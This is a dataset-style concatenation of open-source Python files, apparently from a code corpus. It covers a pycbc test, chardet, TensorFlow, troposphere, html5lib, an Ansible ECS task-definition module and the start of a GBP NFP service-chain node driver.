arrz = pycbc.tmpltbank.generate_anstar_3d_lattice(0, 10, 0, 10, 0, \
10, 0.03)
arrz = numpy.array(arrz)
stockGrid = numpy.loadtxt("%sstockAnstar3D.dat"%(self.dataDir))
numpy.savetxt("new_example.dat", arrz)
errMsg = "Calculated lattice differs from that expected."
self.assertTrue(len(arrz) == len(stockGrid), msg=errMsg)
diff = arrz - stockGrid
self.assertTrue( not (diff > 1E-4).any(), msg=errMsg)
def test_get_mass_distribution(self):
# Just run the function, no checking output
pycbc.tmpltbank.get_mass_distribution([1.35,0.239,0.4,-0.2], 2, \
self.massRangeParams, self.metricParams, \
self.f_upper, \
numJumpPoints=123, chirpMassJumpFac=0.0002, \
etaJumpFac=0.009, spin1zJumpFac=0.1, \
spin2zJumpFac=0.2)
def test_get_phys_cov_masses(self):
evecs = self.metricParams.evecs[self.f_upper]
evals = self.metricParams.evals[self.f_upper]
masses1 = [2.2,1.8,0.4,0.3]
masses2 = [2.21,1.79,0.41,0.29]
xis1 = pycbc.tmpltbank.get_cov_params(masses1[0], masses1[1],
masses1[2], masses1[3], self.metricParams, self.f_upper)
xis2 = pycbc.tmpltbank.get_cov_params(masses2[0], masses2[1],
masses2[2], masses2[3], self.metricParams, self.f_upper)
testXis = [xis1[0],xis1[1]]
b_mtot, b_eta = pnutils.mass1_mass2_to_mtotal_eta(masses2[0],
masses2[1])
bestMasses = [b_mtot, b_eta, masses2[2], masses2[3]]
bestXis = xis2
output = pycbc.tmpltbank.get_physical_covaried_masses(testXis, \
bestMasses, bestXis, 0.0001, self.massRangeParams, \
self.metricParams, self.f_upper)
# Test that returned xis are close enough
diff = (output[6][0] - testXis[0])**2
diff += (output[6][1] - testXis[1])**2
errMsg = 'pycbc.tmpltbank.get_physical_covaried_masses '
errMsg += 'failed to find a point within the desired limits.'
self.assertTrue( diff < 1E-4,msg=errMsg)
# Test that returned masses and xis agree
massT = output[0] + output[1]
etaT = output[0]*output[1] / (massT*massT)
spinSetT = pycbc.pnutils.get_beta_sigma_from_aligned_spins(\
etaT, output[2], output[3])
xisT = pycbc.tmpltbank.get_cov_params(output[0], output[1],
output[2], output[3], self.metricParams, self.f_upper)
errMsg = "Recovered xis do not agree with those expected."
self.assertTrue( abs(xisT[0] - output[6][0]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[1] - output[6][1]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[2] - output[6][2]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[3] - output[6][3]) < 1E-5, msg=errMsg)
# Test again with nsbh flag on
output = pycbc.tmpltbank.get_physical_covaried_masses(testXis, \
bestMasses, bestXis, 0.0001, self.massRangeParams2, \
self.metricParams, self.f_upper)
# Test that returned xis are close enough
diff = (output[6][0] - testXis[0])**2
diff += (output[6][1] - testXis[1])**2
errMsg = 'pycbc.tmpltbank.get_physical_covaried_masses '
errMsg += 'failed to find a point within the desired limits.'
self.assertTrue( diff < 1E-4,msg=errMsg)
# Test that returned masses and xis agree
xisT = pycbc.tmpltbank.get_cov_params(output[0], output[1],
output[2], output[3], self.metricParams, self.f_upper)
errMsg = "Recovered xis do not agree with those expected."
self.assertTrue( abs(xisT[0] - output[6][0]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[1] - output[6][1]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[2] - output[6][2]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[3] - output[6][3]) < 1E-5, msg=errMsg)
def test_stack_xi_direction(self):
# Just run the function, no checking output
evecs = self.metricParams.evecs[self.f_upper]
evals = self.metricParams.evals[self.f_upper]
masses1 = [2.2,1.8,0.4,0.3]
masses2 = [2.21,1.79,0.41,0.29]
xis1 = pycbc.tmpltbank.get_cov_params(masses1[0], masses1[1], \
masses1[2], masses1[3], self.metricParams, self.f_upper)
xis2 = pycbc.tmpltbank.get_cov_params(masses2[0], masses2[1], \
masses2[2], masses2[3], self.metricParams, self.f_upper)
testXis = [xis1[0],xis1[1]]
b_mtot, b_eta = pnutils.mass1_mass2_to_mtotal_eta(masses2[0],
masses2[1])
bestMasses = [b_mtot, b_eta, masses2[2], masses2[3]]
bestXis = xis2
depths = pycbc.tmpltbank.stack_xi_direction_brute(testXis, \
bestMasses, bestXis, 3, 0.03, self.massRangeParams, \
self.metricParams, self.f_upper, numIterations=50)
def test_point_distance(self):
masses1 = [2,2,0.4,0.6]
masses2 = [2.02,1.97,0.41,0.59]
dist, xis1, xis2 = pycbc.tmpltbank.get_point_distance(masses1, \
masses2, self.metricParams, self.f_upper)
diff = abs((dist - 23.3681922039) / dist)
errMsg = "Obtained distance does not agree with expected value."
self.assertTrue( diff < 1E-5, msg=errMsg)
def test_conv_to_sngl(self):
# Just run the function, no checking output
masses1 = [(2,2,0.4,0.3),(4.01,0.249,0.41,0.29)]
pycbc.tmpltbank.convert_to_sngl_inspiral_table(masses1, "a")
def test_ethinca_calc(self):
# Just run the function, no checking output
m1 = 2.
m2 = 2.
s1z = 0.
s2z = 0.
# ethinca calc breaks unless f0 = fLow
self.metricParams.f0 = self.metricParams.fLow
output = pycbc.tmpltbank.calculate_ethinca_metric_comps(
self.metricParams, self.ethincaParams, m1, m2, s1z, s2z)
# restore initial f0 value
self.metricParams.f0 = self.f0
def tearDown(self):
pass
suite = unittest.TestSuite()
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TmpltbankTestClass))
if __name__ == '__main__':
results = unittest.TextTestRunner(verbosity=2).run(suite)
simple_exit(results)
| gpl-3.0 |
d2si-oss/demo-aws-lambda-buffer-api | code/buffer/functions/proxy/vendor/requests/packages/chardet/compat.py | 2943 | 1157 | ######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
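# Illustrative behaviour (comment only, not part of the original module):
# iterating over a byte string yields one-character strings on Python 2 and
# ints on Python 3, so wrap_ord normalises both cases to an int code point.
#
#   wrap_ord('A')   # -> 65 on Python 2 (str input is converted with ord)
#   wrap_ord(65)    # -> 65 on either version (ints pass through unchanged)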
| isc |
ZhangXinNan/tensorflow | tensorflow/contrib/tensor_forest/hybrid/python/models/decisions_to_data_then_nn_test.py | 57 | 4684 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python.models import decisions_to_data_then_nn
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.framework.ops import Operation
from tensorflow.python.framework.ops import Tensor
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import googletest
class DecisionsToDataThenNNTest(test_util.TensorFlowTestCase):
def setUp(self):
self.params = tensor_forest.ForestHParams(
num_classes=2,
num_features=31,
layer_size=11,
num_layers=13,
num_trees=17,
connection_probability=0.1,
hybrid_tree_depth=4,
regularization_strength=0.01,
learning_rate=0.01,
regularization="",
weight_init_mean=0.0,
weight_init_std=0.1)
self.params.regression = False
self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)
def testHParams(self):
self.assertEquals(self.params.num_classes, 2)
self.assertEquals(self.params.num_features, 31)
self.assertEquals(self.params.layer_size, 11)
self.assertEquals(self.params.num_layers, 13)
self.assertEquals(self.params.num_trees, 17)
self.assertEquals(self.params.hybrid_tree_depth, 4)
self.assertEquals(self.params.connection_probability, 0.1)
# Building the graphs modifies the params.
with variable_scope.variable_scope("DecisionsToDataThenNNTest_testHParams"):
# pylint: disable=W0612
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
# Tree with depth 4 should have 2**0 + 2**1 + 2**2 + 2**3 = 15 nodes.
self.assertEquals(self.params.num_nodes, 15)
def testConstructionPollution(self):
"""Ensure that graph building doesn't modify the params in a bad way."""
# pylint: disable=W0612
data = [[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)]
self.assertTrue(isinstance(self.params, tensor_forest.ForestHParams))
self.assertFalse(
isinstance(self.params.num_trees, tensor_forest.ForestHParams))
with variable_scope.variable_scope(
"DecisionsToDataThenNNTest_testConstructionPollution"):
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
self.assertTrue(isinstance(self.params, tensor_forest.ForestHParams))
self.assertFalse(
isinstance(self.params.num_trees, tensor_forest.ForestHParams))
def testInferenceConstruction(self):
# pylint: disable=W0612
data = constant_op.constant(
[[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)])
with variable_scope.variable_scope(
"DecisionsToDataThenNNTest_testInferenceConstruction"):
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
graph = graph_builder.inference_graph(data, None)
self.assertTrue(isinstance(graph, Tensor))
def testTrainingConstruction(self):
# pylint: disable=W0612
data = constant_op.constant(
[[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)])
labels = [1 for _ in range(100)]
with variable_scope.variable_scope(
"DecisionsToDataThenNNTest_testTrainingConstruction"):
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
graph = graph_builder.training_graph(data, labels, None)
self.assertTrue(isinstance(graph, Operation))
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
ccortezb/troposphere | troposphere/validators.py | 20 | 1842 | # Copyright (c) 2012-2013, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
def boolean(x):
if x in [True, 1, '1', 'true', 'True']:
return "true"
if x in [False, 0, '0', 'false', 'False']:
return "false"
raise ValueError
def integer(x):
try:
int(x)
except (ValueError, TypeError):
raise ValueError("%r is not a valid integer" % x)
else:
return x
def positive_integer(x):
p = integer(x)
if int(p) < 0:
raise ValueError("%r is not a positive integer" % x)
return x
def integer_range(minimum_val, maximum_val):
def integer_range_checker(x):
i = int(x)
if i < minimum_val or i > maximum_val:
raise ValueError('Integer must be between %d and %d' % (
minimum_val, maximum_val))
return x
return integer_range_checker
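# Usage sketch (illustrative only; the bounds below are arbitrary): the factory
# returns a checker that can be attached to a resource property.
#
#   weight_validator = integer_range(0, 255)
#   weight_validator(128)   # returns 128
#   weight_validator(999)   # raises ValueError('Integer must be between 0 and 255')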
def network_port(x):
from . import AWSHelperFn
# Network ports can be Ref items
if isinstance(x, AWSHelperFn):
return x
i = integer(x)
if int(i) < -1 or int(i) > 65535:
raise ValueError("network port %r must been between 0 and 65535" % i)
return x
def s3_bucket_name(b):
from re import compile
s3_bucket_name_re = compile(r'^[a-z\d][a-z\d\.-]{1,61}[a-z\d]$')
if s3_bucket_name_re.match(b):
return b
else:
raise ValueError("%s is not a valid s3 bucket name" % b)
def encoding(encoding):
valid_encodings = ['plain', 'base64']
if encoding not in valid_encodings:
raise ValueError('Encoding needs to be one of %r' % valid_encodings)
return encoding
def status(status):
valid_statuses = ['Active', 'Inactive']
if status not in valid_statuses:
raise ValueError('Status needs to be one of %r' % valid_statuses)
return status
| bsd-2-clause |
burzillibus/RobHome | venv/lib/python2.7/site-packages/html5lib/treeadapters/genshi.py | 356 | 1555 | from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName, Attrs
from genshi.core import START, END, TEXT, COMMENT, DOCTYPE
def to_genshi(walker):
text = []
for token in walker:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
text.append(token["data"])
elif text:
yield TEXT, "".join(text), (None, -1, -1)
text = []
if type in ("StartTag", "EmptyTag"):
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
attrs = Attrs([(QName("{%s}%s" % attr if attr[0] is not None else attr[1]), value)
for attr, value in token["data"].items()])
yield (START, (QName(name), attrs), (None, -1, -1))
if type == "EmptyTag":
type = "EndTag"
if type == "EndTag":
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
yield END, QName(name), (None, -1, -1)
elif type == "Comment":
yield COMMENT, token["data"], (None, -1, -1)
elif type == "Doctype":
yield DOCTYPE, (token["name"], token["publicId"],
token["systemId"]), (None, -1, -1)
else:
pass # FIXME: What to do?
if text:
yield TEXT, "".join(text), (None, -1, -1)
| mit |
sidartaoliveira/ansible | lib/ansible/modules/cloud/amazon/ecs_taskdefinition.py | 33 | 16010 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_taskdefinition
short_description: register a task definition in ecs
description:
- Registers or deregisters task definitions in the Amazon Web Services (AWS) EC2 Container Service (ECS)
version_added: "2.0"
author: Mark Chance(@Java1Guy)
requirements: [ json, boto, botocore, boto3 ]
options:
state:
description:
- State whether the task definition should exist or be deleted
required: true
choices: ['present', 'absent']
arn:
description:
- The arn of the task description to delete
required: false
family:
description:
- A Name that would be given to the task definition
required: false
revision:
description:
- A revision number for the task definition
required: False
containers:
description:
- A list of containers definitions
required: False
network_mode:
description:
- The Docker networking mode to use for the containers in the task.
required: false
default: bridge
choices: [ 'bridge', 'host', 'none' ]
version_added: 2.3
task_role_arn:
description:
- The Amazon Resource Name (ARN) of the IAM role that containers in this task can assume. All containers in this task are granted
the permissions that are specified in this role.
required: false
version_added: 2.3
volumes:
description:
- A list of names of volumes to be attached
required: False
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- name: Create task definition
ecs_taskdefinition:
containers:
- name: simple-app
cpu: 10
essential: true
image: "httpd:2.4"
memory: 300
mountPoints:
- containerPath: /usr/local/apache2/htdocs
sourceVolume: my-vol
portMappings:
- containerPort: 80
hostPort: 80
- name: busybox
command:
- >
/bin/sh -c "while true; do echo '<html><head><title>Amazon ECS Sample App</title></head><body><div><h1>Amazon ECS Sample App</h1><h2>Congratulations!
</h2><p>Your application is now running on a container in Amazon ECS.</p>' > top; /bin/date > date ; echo '</div></body></html>' > bottom;
cat top date bottom > /usr/local/apache2/htdocs/index.html ; sleep 1; done"
cpu: 10
entryPoint:
- sh
- "-c"
essential: false
image: busybox
memory: 200
volumesFrom:
- sourceContainer: simple-app
volumes:
- name: my-vol
family: test-cluster-taskdef
state: present
register: task_output
'''
RETURN = '''
taskdefinition:
description: a reflection of the input parameters
type: dict
returned: always
'''
try:
import boto
import botocore
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
try:
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, camel_dict_to_snake_dict, ec2_argument_spec, get_aws_connection_info
class EcsTaskManager:
"""Handles ECS Tasks"""
def __init__(self, module):
self.module = module
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
self.ecs = boto3_conn(module, conn_type='client', resource='ecs', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg="Can't authorize connection - " % str(e))
def describe_task(self, task_name):
try:
response = self.ecs.describe_task_definition(taskDefinition=task_name)
return response['taskDefinition']
except botocore.exceptions.ClientError:
return None
def register_task(self, family, task_role_arn, network_mode, container_definitions, volumes):
validated_containers = []
# Ensures the number parameters are int as required by boto
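        # For example, a container supplied as {'memory': '300', 'cpu': '10'}
        # is normalised to {'memory': 300, 'cpu': 10} before being handed to
        # boto3 (illustrative values only).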
for container in container_definitions:
for param in ('memory', 'cpu', 'memoryReservation'):
if param in container:
container[param] = int(container[param])
if 'portMappings' in container:
for port_mapping in container['portMappings']:
for port in ('hostPort', 'containerPort'):
if port in port_mapping:
port_mapping[port] = int(port_mapping[port])
validated_containers.append(container)
try:
response = self.ecs.register_task_definition(family=family,
taskRoleArn=task_role_arn,
networkMode=network_mode,
containerDefinitions=container_definitions,
volumes=volumes)
except botocore.exceptions.ClientError as e:
self.module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
return response['taskDefinition']
def describe_task_definitions(self, family):
data = {
"taskDefinitionArns": [],
"nextToken": None
}
def fetch():
# Boto3 is weird about params passed, so only pass nextToken if we have a value
params = {
'familyPrefix': family
}
if data['nextToken']:
params['nextToken'] = data['nextToken']
result = self.ecs.list_task_definitions(**params)
data['taskDefinitionArns'] += result['taskDefinitionArns']
data['nextToken'] = result.get('nextToken', None)
return data['nextToken'] is not None
# Fetch all the arns, possibly across multiple pages
while fetch():
pass
# Return the full descriptions of the task definitions, sorted ascending by revision
return list(
sorted(
[self.ecs.describe_task_definition(taskDefinition=arn)['taskDefinition'] for arn in data['taskDefinitionArns']],
key=lambda td: td['revision']
)
)
def deregister_task(self, taskArn):
response = self.ecs.deregister_task_definition(taskDefinition=taskArn)
return response['taskDefinition']
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
arn=dict(required=False, type='str'),
family=dict(required=False, type='str'),
revision=dict(required=False, type='int'),
containers=dict(required=False, type='list'),
network_mode=dict(required=False, default='bridge', choices=['bridge', 'host', 'none'], type='str'),
task_role_arn=dict(required=False, default='', type='str'),
volumes=dict(required=False, type='list')))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_BOTO:
module.fail_json(msg='boto is required.')
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required.')
task_to_describe = None
task_mgr = EcsTaskManager(module)
results = dict(changed=False)
if module.params['state'] == 'present':
if 'containers' not in module.params or not module.params['containers']:
module.fail_json(msg="To use task definitions, a list of containers must be specified")
if 'family' not in module.params or not module.params['family']:
module.fail_json(msg="To use task definitions, a family must be specified")
family = module.params['family']
existing_definitions_in_family = task_mgr.describe_task_definitions(module.params['family'])
if 'revision' in module.params and module.params['revision']:
            # The definition specifies revision. We must guarantee that an active revision of that number will result from this.
revision = int(module.params['revision'])
# A revision has been explicitly specified. Attempt to locate a matching revision
tasks_defs_for_revision = [td for td in existing_definitions_in_family if td['revision'] == revision]
existing = tasks_defs_for_revision[0] if len(tasks_defs_for_revision) > 0 else None
if existing and existing['status'] != "ACTIVE":
# We cannot reactivate an inactive revision
module.fail_json(msg="A task in family '%s' already exists for revsion %d, but it is inactive" % (family, revision))
elif not existing:
if not existing_definitions_in_family and revision != 1:
module.fail_json(msg="You have specified a revision of %d but a created revision would be 1" % revision)
elif existing_definitions_in_family and existing_definitions_in_family[-1]['revision'] + 1 != revision:
module.fail_json(msg="You have specified a revision of %d but a created revision would be %d" %
(revision, existing_definitions_in_family[-1]['revision'] + 1))
else:
existing = None
def _right_has_values_of_left(left, right):
# Make sure the values are equivalent for everything left has
for k, v in left.items():
if not ((not v and (k not in right or not right[k])) or (k in right and v == right[k])):
# We don't care about list ordering because ECS can change things
if isinstance(v, list) and k in right:
left_list = v
right_list = right[k] or []
if len(left_list) != len(right_list):
return False
for list_val in left_list:
if list_val not in right_list:
return False
else:
return False
# Make sure right doesn't have anything that left doesn't
for k, v in right.items():
if v and k not in left:
return False
return True
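            # Illustration of the comparison above: a requested container
            # {'image': 'httpd', 'links': []} matches an existing definition
            # {'image': 'httpd', 'cpu': 0}, because falsy values and keys
            # missing on either side are treated as equivalent, whereas a
            # truthy key present only on the existing side is a mismatch.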
def _task_definition_matches(requested_volumes, requested_containers, existing_task_definition):
if td['status'] != "ACTIVE":
return None
existing_volumes = td.get('volumes', []) or []
if len(requested_volumes) != len(existing_volumes):
# Nope.
return None
if len(requested_volumes) > 0:
for requested_vol in requested_volumes:
found = False
for actual_vol in existing_volumes:
if _right_has_values_of_left(requested_vol, actual_vol):
found = True
break
if not found:
return None
                existing_containers = (
                    existing_task_definition.get('containerDefinitions', []) or [])
if len(requested_containers) != len(existing_containers):
# Nope.
return None
for requested_container in requested_containers:
found = False
for actual_container in existing_containers:
if _right_has_values_of_left(requested_container, actual_container):
found = True
break
if not found:
return None
return existing_task_definition
# No revision explicitly specified. Attempt to find an active, matching revision that has all the properties requested
for td in existing_definitions_in_family:
requested_volumes = module.params.get('volumes', []) or []
requested_containers = module.params.get('containers', []) or []
existing = _task_definition_matches(requested_volumes, requested_containers, td)
if existing:
break
if existing:
# Awesome. Have an existing one. Nothing to do.
results['taskdefinition'] = existing
else:
if not module.check_mode:
# Doesn't exist. create it.
volumes = module.params.get('volumes', []) or []
for container in module.params['containers']:
if 'environment' in container:
for environment in container['environment']:
environment['value'] = str(environment['value'])
results['taskdefinition'] = task_mgr.register_task(module.params['family'],
module.params['task_role_arn'],
module.params['network_mode'],
module.params['containers'],
volumes)
results['changed'] = True
elif module.params['state'] == 'absent':
# When de-registering a task definition, we can specify the ARN OR the family and revision.
if module.params['state'] == 'absent':
if 'arn' in module.params and module.params['arn'] is not None:
task_to_describe = module.params['arn']
elif 'family' in module.params and module.params['family'] is not None and 'revision' in module.params and \
module.params['revision'] is not None:
task_to_describe = module.params['family'] + ":" + str(module.params['revision'])
else:
module.fail_json(msg="To use task definitions, an arn or family and revision must be specified")
existing = task_mgr.describe_task(task_to_describe)
if not existing:
pass
else:
# It exists, so we should delete it and mark changed. Return info about the task definition deleted
results['taskdefinition'] = existing
if 'status' in existing and existing['status'] == "INACTIVE":
results['changed'] = False
else:
if not module.check_mode:
task_mgr.deregister_task(task_to_describe)
results['changed'] = True
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
jiahaoliang/group-based-policy | gbpservice/neutron/services/servicechain/plugins/ncp/node_drivers/nfp_node_driver.py | 1 | 34832 | # Copyright (c) 2016 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import eventlet
from keystoneclient import exceptions as k_exceptions
from keystoneclient.v2_0 import client as keyclient
from neutron._i18n import _LE
from neutron._i18n import _LI
from neutron.common import exceptions as n_exc
from neutron.common import rpc as n_rpc
from neutron.db import model_base
from neutron.plugins.common import constants as pconst
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_serialization import jsonutils
from oslo_utils import excutils
import sqlalchemy as sa
from sqlalchemy.orm.exc import NoResultFound
from gbpservice.common import utils
from gbpservice.neutron.services.servicechain.plugins.ncp import (
exceptions as exc)
from gbpservice.neutron.services.servicechain.plugins.ncp import driver_base
from gbpservice.neutron.services.servicechain.plugins.ncp import plumber_base
from gbpservice.nfp.common import constants as nfp_constants
from gbpservice.nfp.common import topics as nfp_rpc_topics
NFP_NODE_DRIVER_OPTS = [
cfg.BoolOpt('is_service_admin_owned',
help=_("Parameter to indicate whether the Service VM has to "
"be owned by the Admin"),
default=False),
cfg.IntOpt('service_create_timeout',
default=600,
help=_("Seconds to wait for service creation "
"to complete")),
cfg.IntOpt('service_delete_timeout',
default=120,
help=_("Seconds to wait for service deletion "
"to complete")),
]
cfg.CONF.register_opts(NFP_NODE_DRIVER_OPTS, "nfp_node_driver")
LOG = logging.getLogger(__name__)
class InvalidServiceType(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver only supports the services "
"VPN, Firewall and LB in a Service Chain")
class ServiceProfileRequired(exc.NodeCompositionPluginBadRequest):
message = _("A Service profile is required in Service node")
class NodeVendorMismatch(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver only handles nodes which have service "
"profile with vendor name %(vendor)s")
class DuplicateServiceTypeInChain(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver does not support duplicate "
"service types in same chain")
class RequiredProfileAttributesNotSet(exc.NodeCompositionPluginBadRequest):
message = _("The required attributes in service profile are not present")
class InvalidNodeOrderInChain(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver does not support the order "
"of nodes defined in the current service chain spec")
class UnSupportedServiceProfile(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver does not support this service "
"profile with service type %(service_type)s and vendor "
"%(vendor)s")
class UnSupportedInsertionMode(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver supports only L3 Insertion "
"mode")
class ServiceInfoNotAvailableOnUpdate(n_exc.NeutronException):
message = _("Service information is not available with Service Manager "
"on node update")
class VipNspNotSetonProvider(n_exc.NeutronException):
message = _("Network Service policy for VIP IP address is not configured "
"on the Providing Group")
class NodeInstanceDeleteFailed(n_exc.NeutronException):
message = _("Node instance delete failed in NFP Node driver")
class NodeInstanceCreateFailed(n_exc.NeutronException):
message = _("Node instance create failed in NFP Node driver")
class NodeInstanceUpdateFailed(n_exc.NeutronException):
message = _("Node instance update failed in NFP Node driver")
class ServiceNodeInstanceNetworkFunctionMapping(model_base.BASEV2):
"""ServiceChainInstance to NFP network function mapping."""
__tablename__ = 'ncp_node_instance_network_function_mappings'
sc_instance_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
sc_node_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
network_function_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
# These callback apis are not used today, This is supposed to be used when
# GBP supports asynchronous operations
class NFPCallbackApi(object):
RPC_API_VERSION = "1.0"
target = oslo_messaging.Target(version=RPC_API_VERSION)
def __init__(self, node_driver):
self.node_driver = node_driver
def network_function_created(self, context, network_function):
pass
def network_function_deleted(self, context, network_function):
pass
class NFPClientApi(object):
""" Client side of the NFP Framework user """
RPC_API_VERSION = '1.0'
def __init__(self, topic):
target = oslo_messaging.Target(
topic=topic, version=self.RPC_API_VERSION)
self.client = n_rpc.get_client(target)
def create_network_function(self, context, network_function):
cctxt = self.client.prepare(
fanout=False, topic=nfp_rpc_topics.NFP_NSO_TOPIC)
return cctxt.call(
context,
'create_network_function',
network_function=network_function)
# cctxt.cast(context, 'create_service', service_info=service_info)
def delete_network_function(self, context, network_function_id):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(
context,
'delete_network_function',
network_function_id=network_function_id)
def update_network_function(self, context, network_function_id, config):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(
context,
'update_network_function',
network_function_id=network_function_id,
config=config)
def get_network_function(self, context, network_function_id):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(
context,
'get_network_function',
network_function_id=network_function_id)
def consumer_ptg_added_notification(self, context, network_function_id,
policy_target_group):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'consumer_ptg_added_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
return cctxt.call(
context,
'consumer_ptg_added_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
def consumer_ptg_removed_notification(self, context, network_function_id,
policy_target_group):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'consumer_ptg_removed_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
return cctxt.call(
context,
'consumer_ptg_removed_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
def policy_target_added_notification(self, context, network_function_id,
policy_target):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'policy_target_added_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
return cctxt.call(
context,
'policy_target_added_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
def policy_target_removed_notification(self, context, network_function_id,
policy_target):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'policy_target_removed_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
return cctxt.call(
context,
'policy_target_removed_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
class NFPNodeDriver(driver_base.NodeDriverBase):
SUPPORTED_SERVICE_TYPES = [
pconst.LOADBALANCER, pconst.FIREWALL, pconst.VPN,
pconst.LOADBALANCERV2]
SUPPORTED_SERVICE_VENDOR_MAPPING = {
